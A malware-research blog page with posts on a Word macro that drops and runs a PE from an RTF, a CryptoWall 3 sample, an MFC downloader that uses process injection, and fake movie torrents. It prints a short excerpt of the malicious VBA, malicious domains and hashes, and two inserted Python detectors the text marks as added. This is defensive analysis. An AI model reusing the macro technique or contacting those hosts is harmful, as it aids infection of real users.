Anti-Malware Laboratory: Yet Another Malware Blog<br />
<h2 style="text-align: left;">
Another Macro Script Technique in Executing Malware</h2>
Posted 2015-10-09.<br />
Recently I came across a macro malware that uses a technique that was new to me. If macros are enabled, the macro script does the following:<br />
<br />
<ol>
<li>Save the document as RTF files, 300.rtf and 301.rtf</li>
<li>Open 300.rtf, which carries an embedded PE file</li>
<li>Execute the PE file</li>
</ol>
Let's start analyzing the file and see how it pulls off the trick above.<br />
<br />
Inspecting the file in Hiew, we can see that there is an embedded PE file. Simply opening the document in Word does not mean the PE file will run on the system, but with the help of the macro script that becomes possible.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiApxq_r9V5SgTteetourGspEsHQIOtwRZQC58kGEaP-p2xnvcujn2MgZGcf6aIKqXxkJU63rzkFwJsAcVJSDN39f20FlQviGnCvtVe0EqGhPs2FZ4xFbAl_xyf3cfvmrMh6jNwmiCAAZA/s1600/embedded+PE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiApxq_r9V5SgTteetourGspEsHQIOtwRZQC58kGEaP-p2xnvcujn2MgZGcf6aIKqXxkJU63rzkFwJsAcVJSDN39f20FlQviGnCvtVe0EqGhPs2FZ4xFbAl_xyf3cfvmrMh6jNwmiCAAZA/s320/embedded+PE.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs4qCApNQwtgb1cJNGkLKxbbnlNwQeXYNGI3Gi_vYdUAoxulO6uX-ynE9qPsa8ZlqcalsL8vVfpDHq7Lqy9nBz1vM2l_7KJkx5vKqJ8X0IYDdGZV5sWxE1oHVwXILjQaBNaII9EFeU_iI/s1600/macro.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs4qCApNQwtgb1cJNGkLKxbbnlNwQeXYNGI3Gi_vYdUAoxulO6uX-ynE9qPsa8ZlqcalsL8vVfpDHq7Lqy9nBz1vM2l_7KJkx5vKqJ8X0IYDdGZV5sWxE1oHVwXILjQaBNaII9EFeU_iI/s320/macro.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i>The macro script present in the file. The macro project is password protected.</i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU7H3XLlhbzgLoIRcFqHUuvj9_xi5fbhLUhYBQlyGcs4eqm1FKoxh6dZGwFckvWBM-quElKqp239VmbpDOdyLReKLyee9UxbiGUH1Ocm2Fs_gzL9uVLABAZuN70CYx5INv4oK_pgDiWpk/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU7H3XLlhbzgLoIRcFqHUuvj9_xi5fbhLUhYBQlyGcs4eqm1FKoxh6dZGwFckvWBM-quElKqp239VmbpDOdyLReKLyee9UxbiGUH1Ocm2Fs_gzL9uVLABAZuN70CYx5INv4oK_pgDiWpk/s320/1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i>Extracted Macro script</i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: left;">
Inspecting 300.rtf, we notice that it contains an embedded object. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDP5rhdBSYANGPA5rCVq9WA125FKzPWkx3pgUpIPd8WmtC1yCzYcdcIsn0_gqbYHz8-0hKolHgGsWKItUQq0fmo5MoqNRAwDUt4bKY1TozNufN_H1H8kfbS-FZrxLSM4Klp7lBwZBcczw/s1600/rtf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDP5rhdBSYANGPA5rCVq9WA125FKzPWkx3pgUpIPd8WmtC1yCzYcdcIsn0_gqbYHz8-0hKolHgGsWKItUQq0fmo5MoqNRAwDUt4bKY1TozNufN_H1H8kfbS-FZrxLSM4Klp7lBwZBcczw/s320/rtf.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEuBs-233nQJgNO6uCYye7lNMuIRQOq_mqAGTmZYbJwN3kFt3BpDcaYaDZdommnGUCN_eM_LKULo55PclYbUxNtwwMMVnZVAwUtRxuO9L7JZ-6C9NVNELBo6TaeJSGyBNXHkcc7LNtx3I/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEuBs-233nQJgNO6uCYye7lNMuIRQOq_mqAGTmZYbJwN3kFt3BpDcaYaDZdommnGUCN_eM_LKULo55PclYbUxNtwwMMVnZVAwUtRxuO9L7JZ-6C9NVNELBo6TaeJSGyBNXHkcc7LNtx3I/s320/12.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
With the following instructions the macro opens 300.rtf in a second Word instance; the embedded PE file is extracted to the TEMP folder, and the macro script can then execute that file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
Set sttKaka = CreateObject("Word.Application")   ' spawn a second Word instance via COM automation</div>
<div class="separator" style="clear: both;">
sttKaka.Visible = False                          ' keep that instance hidden from the user</div>
<div class="separator" style="clear: both;">
Set docWord = sttKaka.Documents.Open(TCA)        ' TCA holds the path of the saved 300.rtf</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
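A defender-side check for the carrier file described above, added here as an example and not part of the original post: it pulls the hex payload of every \objdata object out of an RTF file and reports any object whose bytes contain a PE image (an MZ header whose e_lfanew really points at a PE signature). The sample RTF and the fake PE inside it are constructed for the demo, and the OLE1 wrapper is simplified rather than a byte-exact Packager stream.

```python
import re
import struct

# Hex payload following an RTF \objdata control word (OLE 1.0 object data).
# Only whitespace inside the hex is tolerated here; RTF that splices control
# words into the hex run needs a full tokenizer before this check.
OBJDATA_RE = re.compile(rb"\\objdata\b\s*([0-9A-Fa-f\s]+)")


def extract_objdata_blobs(rtf: bytes) -> list:
    """Decode every \\objdata hex run in an RTF document into raw bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:              # tolerate a truncated trailing nibble
            hexstr = hexstr[:-1]
        blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs


def find_pe_offsets(blob: bytes) -> list:
    """Offsets of each 'MZ' header whose e_lfanew really points at 'PE\\0\\0'."""
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):                      # room for a DOS header
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if sig + 4 <= len(blob) and blob[sig:sig + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def scan_rtf(rtf: bytes) -> dict:
    """Count embedded objects and report those that carry a PE image."""
    report = {"objects": 0, "objects_with_pe": 0, "pe_offsets": []}
    for blob in extract_objdata_blobs(rtf):
        report["objects"] += 1
        offsets = find_pe_offsets(blob)
        if offsets:
            report["objects_with_pe"] += 1
            report["pe_offsets"].extend(offsets)
    return report


def build_fake_pe() -> bytes:
    """Constructed, non-executable stand-in for an embedded PE: MZ + e_lfanew + PE signature."""
    dos = b"MZ" + b"\x00" * 0x3A                # 0x3C bytes up to e_lfanew
    dos += struct.pack("<I", 0x40)              # e_lfanew -> right after the DOS header
    return dos + b"PE\x00\x00" + b"\x00" * 20   # signature + dummy COFF header


def build_sample_rtf() -> bytes:
    """Constructed RTF with one 'Package' object wrapping the fake PE (simplified OLE1 layout)."""
    payload = build_fake_pe()
    ole1 = struct.pack("<II", 0x00000501, 2)                # OLE version, format 2 = embedded
    ole1 += struct.pack("<I", 8) + b"Package\x00"           # class name
    ole1 += struct.pack("<II", 0, 0)                        # empty topic / item names
    ole1 += struct.pack("<I", len(payload)) + payload       # native data size + data
    hexdata = ole1.hex().encode("ascii")
    # Real samples wrap the hex across many lines; whitespace is legal inside \objdata.
    wrapped = b"\r\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata "
            + wrapped + b"}}\\par Some harmless text.}")


if __name__ == "__main__":
    print(scan_rtf(build_sample_rtf()))
```

Running the script on a real 300.rtf is a matter of passing the file's bytes to scan_rtf; an object reported with a PE inside is exactly what the hidden Word instance would drop into TEMP.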
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHdqC_vlWp8PQT6bnob6l1ddTsFeSrgZaUDJLCDYi365WyPF5fzjVtpMcl570eAP5U_Tn7P10rqXY23G9emNOff5zWe4IjYoJuqscUAZcXV4vI4xXuFVxrTr0IcJetjCw5VaQ1h1lCEzE/s1600/process.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHdqC_vlWp8PQT6bnob6l1ddTsFeSrgZaUDJLCDYi365WyPF5fzjVtpMcl570eAP5U_Tn7P10rqXY23G9emNOff5zWe4IjYoJuqscUAZcXV4vI4xXuFVxrTr0IcJetjCw5VaQ1h1lCEzE/s320/process.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
This technique only works with Microsoft Word 2010 and Microsoft Word 2013; with Word 2007 and below it triggers a Privacy Warning. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fF7-Kp5csbMDCjZ4kTX-yg0PxOSkIRM9BMe3yPlbBKDWhq0Oq-68Dc2KSwZc0xAbl2LcgL0SLJ5q29Gc65jN88FMKalmXyddvQ_Ok8lgaQ9h2PjB6OuJVwGGDTujfErypWResN33j14/s1600/warning.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fF7-Kp5csbMDCjZ4kTX-yg0PxOSkIRM9BMe3yPlbBKDWhq0Oq-68Dc2KSwZc0xAbl2LcgL0SLJ5q29Gc65jN88FMKalmXyddvQ_Ok8lgaQ9h2PjB6OuJVwGGDTujfErypWResN33j14/s320/warning.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">It is highly advisable to disable macros to prevent this type of malware from compromising your system.</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
Posted by bernadette.<br />
<h2 style="text-align: left;">
New Crypto 3.0 sample</h2>
Posted 2015-08-12.<br />
On August 11, 2015, one of our systems captured a new sample belonging to the CryptoWall 3 (Crowti) family.<br />
<br />
Using ThreatSecure Network's behavioral determination, we were able to confirm the "maliciousness" of this sample, as it exhibited the following notable behaviors:<br />
<br />
<ul>
<li>"Runs an exe in the system folder"</li>
<li>"Creates a hidden file"</li>
<li>"Known malicious behavior, Crowti related"</li>
<li>"Opens Windows configuration files"</li>
<li>"Searches for credentials"</li>
<li>"Executes non-standard memory operations"</li>
<li>"Creates a registry entry to start itself at each boot"</li>
<li>"Disables or removes Windows services"</li>
<li>"Checks for kernel debugger"</li>
</ul>
<br />
CryptoWall is a well-known ransomware that encrypts files on the targeted PC and urges the victim to pay in exchange for decrypting the "hostaged" files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn-UF52zVVuNU-wj-WQkwJbU27KE53QOwnE1uYBpKgKmJRDJKUnu4tuxshqzN1mbW4k-kea6GHK337iqM5E1ewzrnzxBZFnHA5AKRDZokcd-3xjUSXqlRUcTXF_cxiq4OSM0c6wcq6pc0/s1600/HELP_DECRYPT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn-UF52zVVuNU-wj-WQkwJbU27KE53QOwnE1uYBpKgKmJRDJKUnu4tuxshqzN1mbW4k-kea6GHK337iqM5E1ewzrnzxBZFnHA5AKRDZokcd-3xjUSXqlRUcTXF_cxiq4OSM0c6wcq6pc0/s320/HELP_DECRYPT.jpg" width="320" /></a></div>
<div style="text-align: center;">
Fig 1. HELP_DECRYPT.PNG</div>
<br />
<br />
One of the most noticeable features of this sample is its icon, which is technically nothing (see Fig 2).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu97WiZsYDgpUe_eakpaBuMO6XDAN1Ok3HRWby6yGosTX17HfBNWVo6_5XiMRZTqzmpGOCVaGgXMA9WC-e-TcJrAHUB65TsEwnnF6WIWSDLZPNN_n9QtNyvdeC0EJuTRu8ZIZeHBkhJBo/s1600/invisible+icon.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="229" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu97WiZsYDgpUe_eakpaBuMO6XDAN1Ok3HRWby6yGosTX17HfBNWVo6_5XiMRZTqzmpGOCVaGgXMA9WC-e-TcJrAHUB65TsEwnnF6WIWSDLZPNN_n9QtNyvdeC0EJuTRu8ZIZeHBkhJBo/s320/invisible+icon.jpg" width="320" /></a></div>
<div style="text-align: center;">
Fig 2. Notice the "invisible" icon?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The sample also beacons out to the following known malicious hosts, attempting to download and to POST data gathered from the victim's PC:</div>
<ul>
<li>ip-addr.es</li>
<li>myexternalip.com/raw</li>
<li>curlmyip.com</li>
<li>glamazona.com</li>
<li>fortecegypt.com</li>
</ul>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
Posted by Anonymous.<br />
<h2 style="text-align: left;">
Uncovering a new MFC downloader</h2>
Posted 2015-08-07.<br />
On July 23, 2015, ThreatTrack's new product, <i>ThreatSecure Network (TSN)</i>, uncovered a new sample that was not detected by any major antivirus vendor. Using TSN's unique behavioral determination engine, we were able to tag a particular sample passing through one of our appliances as possibly malicious.<br />
<br />
Our engine determined that it performed anomalous behaviors, some of which are:<br />
<ul>
<li>Nonstandard memory operations</li>
<li>Creates suspended or unsuccessful process</li>
<li>Sleeps for a long period of time</li>
<li>Beacons out to remote locations</li>
</ul>
<br />
Sample md5: 759c8c5b2b8cf9cd4dcbc1beee1cf3b7<br />
<br />
Looking at its internals, the sample is compiled with C++ MFC, possibly in an attempt to make it harder for analysts to reverse engineer what it does. Digging deeper with the tools at my disposal, I was able to find the function that the MFC code calls to perform the malicious behavior.<br />
Initially, finding the malicious code is a bit tricky, since the sample itself was compiled using MFC.<br />
I could also use IDA and debug it side by side with Olly, but I'm kinda lazy, so I just downloaded the .lib files that let me resolve the API names from the ordinals.<br />
Tracing through the calls, I found an interesting API in the MFC42.dll memory space that accepts 5 arguments (Fig 1)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBT4vd2r8bKNN8NOx5bhvS7EkWJBztGYNjXvoNmTK4xxF97TANJwrxC89cpArzvt4u2exsEJLh9YCskQKufWThEXEBww3tdFPHR4U3EYdWgEb4bGWlVFrdY97iWVXxcOXWusvzkCryAU/s1600/createdialog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBT4vd2r8bKNN8NOx5bhvS7EkWJBztGYNjXvoNmTK4xxF97TANJwrxC89cpArzvt4u2exsEJLh9YCskQKufWThEXEBww3tdFPHR4U3EYdWgEb4bGWlVFrdY97iWVXxcOXWusvzkCryAU/s320/createdialog.jpg" width="320" /></a></div>
<br />
<div style="text-align: center;">
Fig 1</div>
<div style="text-align: center;">
<br /></div>
The interesting part here is that this points to an API that eventually calls a function inside the sample we're debugging. Tracing a bit further, we landed on a curious piece of code that does some sort of copying.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHoWwPUdV668FVu3RytrhGM9bZkILDrUKwkzVLEduwmt5ev0WmVju4YrQvMPcJZndTbrM1YqdPdy_hAWP9Ty6jGl0KbOYCnsn5Ba0njKIqMnBJlPZJNIT-1pVkRMsW7UGe5oFX-1VavW8/s1600/initialstackcopy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHoWwPUdV668FVu3RytrhGM9bZkILDrUKwkzVLEduwmt5ev0WmVju4YrQvMPcJZndTbrM1YqdPdy_hAWP9Ty6jGl0KbOYCnsn5Ba0njKIqMnBJlPZJNIT-1pVkRMsW7UGe5oFX-1VavW8/s320/initialstackcopy.jpg" width="320" /></a></div>
<div style="text-align: center;">
Fig 2</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Fig 2 illustrates the snippet of code that copies part of the malware onto the stack and jumps to it. This in itself is malicious: starting with Windows XP SP2, Microsoft has shipped Data Execution Prevention (DEP), which prevents code from executing out of data regions such as the stack.</div>
<div style="text-align: left;">
So what the engine told me about "Nonstandard memory operations" was true. What about the rest?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
To make it easier for me, I dumped the parts of code that it copied onto the stack, inserted them into a "container" file and launched IDA :) This way, even though it has several levels of encryption, I can follow the jumps and calls and tag them while I debug it in Olly. </div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZk5LVDpO1dtmsqqAx3OpbZqJyvws3SOHUxiIuoLanWBMqVRQbHCgUfpp2LCbcgS2brdYDHe02smBhPF1q5Dqn4yyXDBBt03Z4gv-duacKoLLJgIYNoI9WUniDJMdAUCPAt5dFv524q_c/s1600/suspend.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZk5LVDpO1dtmsqqAx3OpbZqJyvws3SOHUxiIuoLanWBMqVRQbHCgUfpp2LCbcgS2brdYDHe02smBhPF1q5Dqn4yyXDBBt03Z4gv-duacKoLLJgIYNoI9WUniDJMdAUCPAt5dFv524q_c/s320/suspend.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
Fig 3</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Fig 3 shows several functions that write code into the memory of a process created with a suspended thread and, after some time, resume it. This in turn executes another "copy" of the malware in memory.</div>
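The chain in Fig 3 is what a behavioral engine keys on. As an added example (not the post's or TSN's code), here is a small detector that replays a constructed API-call trace and tags the create-suspended / WriteProcessMemory / ResumeThread sequence, a remote RWX allocation, and a long Sleep; the trace format and the pids are assumptions made for the demo.

```python
import re
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004          # CreateProcess dwCreationFlags bit
PAGE_EXECUTE_READWRITE = 0x40          # VirtualAllocEx flProtect value

# Constructed API trace in a simple key=value format (not the output of any real
# sandbox). pid 1000 follows the pattern seen in the post; pid 3000 is a benign control.
SAMPLE_TRACE = """\
pid=1000 api=CreateProcessA image=C:\\Windows\\System32\\svchost.exe flags=0x00000004 child=2000
pid=1000 api=Sleep ms=300000
pid=1000 api=VirtualAllocEx target=2000 protect=0x40 size=0x12000
pid=1000 api=WriteProcessMemory target=2000 size=0x12000
pid=1000 api=ResumeThread target=2000
pid=3000 api=CreateProcessA image=C:\\Windows\\notepad.exe flags=0x00000000 child=4000
pid=3000 api=Sleep ms=100
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Turn one 'key=value ...' trace line into a dict of strings."""
    return dict(KV_RE.findall(line))


def detect(trace: str, long_sleep_ms: int = 60_000) -> dict:
    """Map each pid to the suspicious behaviours it showed, in order of occurrence."""
    suspended = set()                 # child pids created with CREATE_SUSPENDED
    written = set()                   # suspended children that received injected code
    findings = defaultdict(list)
    for line in trace.splitlines():
        ev = parse_event(line)
        pid, api, target = ev.get("pid"), ev.get("api"), ev.get("target")
        if api in ("CreateProcessA", "CreateProcessW"):
            if int(ev["flags"], 16) & CREATE_SUSPENDED:
                suspended.add(ev["child"])
                findings[pid].append("suspended_create")
        elif api == "VirtualAllocEx" and target in suspended:
            if int(ev["protect"], 16) == PAGE_EXECUTE_READWRITE:
                findings[pid].append("remote_rwx_alloc")
        elif api == "WriteProcessMemory" and target in suspended:
            written.add(target)
            findings[pid].append("remote_write")
        elif api == "ResumeThread" and target in written:
            findings[pid].append("resume_after_write")
        elif api == "Sleep" and int(ev["ms"]) >= long_sleep_ms:
            findings[pid].append("long_sleep")
    return dict(findings)


def hollowing_pids(findings: dict) -> set:
    """Pids that completed the full create-suspended / write / resume chain."""
    chain = {"suspended_create", "remote_write", "resume_after_write"}
    return {pid for pid, tags in findings.items() if chain <= set(tags)}


if __name__ == "__main__":
    result = detect(SAMPLE_TRACE)
    print(result, hollowing_pids(result))
```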
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now, this sample contains 2 more executables inside its body, both encrypted. These are the ones responsible for connecting to a remote location, then downloading and executing another executable in memory. Further research showed that the family connected to this downloader sample was also seen trying the following remote URLs.</div>
<div style="text-align: left;">
<br /></div>
Posted by Anonymous.<br />
<h2 style="text-align: left;">
[BE CAUTIOUS] Dragon Ball Z: Resurrection of F MALWARE and SCAM</h2>
Posted 2015-05-20.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-158DnDUHaNcCJL_ccOi1xyZ8LBswLt5eZkjWTFv88umZYEnYRS6hZxlqcJHfPtNduKcTYod5tzzQW7WO-RS-J65MJkmjntDn1tRntMbhynTG9d4mehJwDBFvNH3Rnf9VXU0egvKVkM/s1600/DBZ_THE_MOVIE_NO._15.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-158DnDUHaNcCJL_ccOi1xyZ8LBswLt5eZkjWTFv88umZYEnYRS6hZxlqcJHfPtNduKcTYod5tzzQW7WO-RS-J65MJkmjntDn1tRntMbhynTG9d4mehJwDBFvNH3Rnf9VXU0egvKVkM/s400/DBZ_THE_MOVIE_NO._15.png" width="282" /></a></div>
<span style="font-family: Verdana, sans-serif;">Be wary of downloading movies from torrent sites. A file can still be an executable even when its size is as large as a gigabyte. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">A recent Dragon Ball Z movie from Japan, entitled Dragon Ball Z: Resurrection 'F', has been making the rounds as of this writing. Reference: <a href="http://en.wikipedia.org/wiki/Dragon_Ball_Z:_Resurrection_%27F%27">http://en.wikipedia.org/wiki/Dragon_Ball_Z:_Resurrection_%27F%27</a></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Searching torrents for this movie shows a small number of seeds.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR2NOleztXkxgzyy509nzyDvMIWVprITtHsxEWDKxcpcjVVkRxSFCDCFps2KY8FZYx2zLUUBLSAuFXDKWZdOvDy9YTZoX649po3NHkFWaU8_H5BM3gYikaVD2w1e4xquSQiJ2W3zRb0kI/s1600/Torrentz1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR2NOleztXkxgzyy509nzyDvMIWVprITtHsxEWDKxcpcjVVkRxSFCDCFps2KY8FZYx2zLUUBLSAuFXDKWZdOvDy9YTZoX649po3NHkFWaU8_H5BM3gYikaVD2w1e4xquSQiJ2W3zRb0kI/s400/Torrentz1.png" width="400" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Let's check the top seeded torrent's Trackers.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKhwUO9snjuuPuACBxj_Y8zOM8Dxn0No7TqtuRX94NyvBZhmGhV3RwEWWmEhh-Mg0IuGG4FjKc8wUAqAEW8XXuObgY0ilT4eO9IuX3YtxiBbir9ZLo5uMzfKRvoc92X9U4W8Ta_KPkbZA/s1600/Torrentz2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKhwUO9snjuuPuACBxj_Y8zOM8Dxn0No7TqtuRX94NyvBZhmGhV3RwEWWmEhh-Mg0IuGG4FjKc8wUAqAEW8XXuObgY0ilT4eO9IuX3YtxiBbir9ZLo5uMzfKRvoc92X9U4W8Ta_KPkbZA/s400/Torrentz2.png" width="400" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The trackers point to coppersurfer.tk, demonii.com, and tfile.me.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here's the interesting part.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQMCG5uwAB9TLUv23YzF-IDLdfggAyghSlJiyKoloVEY9ns75KUohbsS2MPN9-tW6HBoBEUBdHulSV7edZ0d3Doh5ChWagxvs-u_W7A_s6q0PqBwZt-fdbLAMkt9GsKzmxdlerLI3S_zA/s1600/Torrentz3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQMCG5uwAB9TLUv23YzF-IDLdfggAyghSlJiyKoloVEY9ns75KUohbsS2MPN9-tW6HBoBEUBdHulSV7edZ0d3Doh5ChWagxvs-u_W7A_s6q0PqBwZt-fdbLAMkt9GsKzmxdlerLI3S_zA/s400/Torrentz3.png" width="400" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif;">Notice the .exe file name extension instead of .avi or .mkv or the like.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">All 6 torrents shown at the top point to downloading a .exe file, which could be malware. The downloaded executable has an MD5 of e62607261e5138d76497e3ccc092e20b and is an NSIS-compiled SFX.</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">While that was downloading, here is another one, this time a scam rather than malware. Googling for this movie's torrent usually ends up at a page like this.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVyyBsuu-fEKIpr7iu2UbtrKuolICErWkLsPgwMDlD1ytyaMzKiXPQTSna7JHFkM2OCG8mxAF3XXNApns6ytvswPFK4otypALBEtanaF9_ssymxT1544DevjzSjEE0uh1HM2yzxW6mpv8/s1600/pirate1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVyyBsuu-fEKIpr7iu2UbtrKuolICErWkLsPgwMDlD1ytyaMzKiXPQTSna7JHFkM2OCG8mxAF3XXNApns6ytvswPFK4otypALBEtanaF9_ssymxT1544DevjzSjEE0uh1HM2yzxW6mpv8/s400/pirate1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Following the piratetorrents.net link directs to this page.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
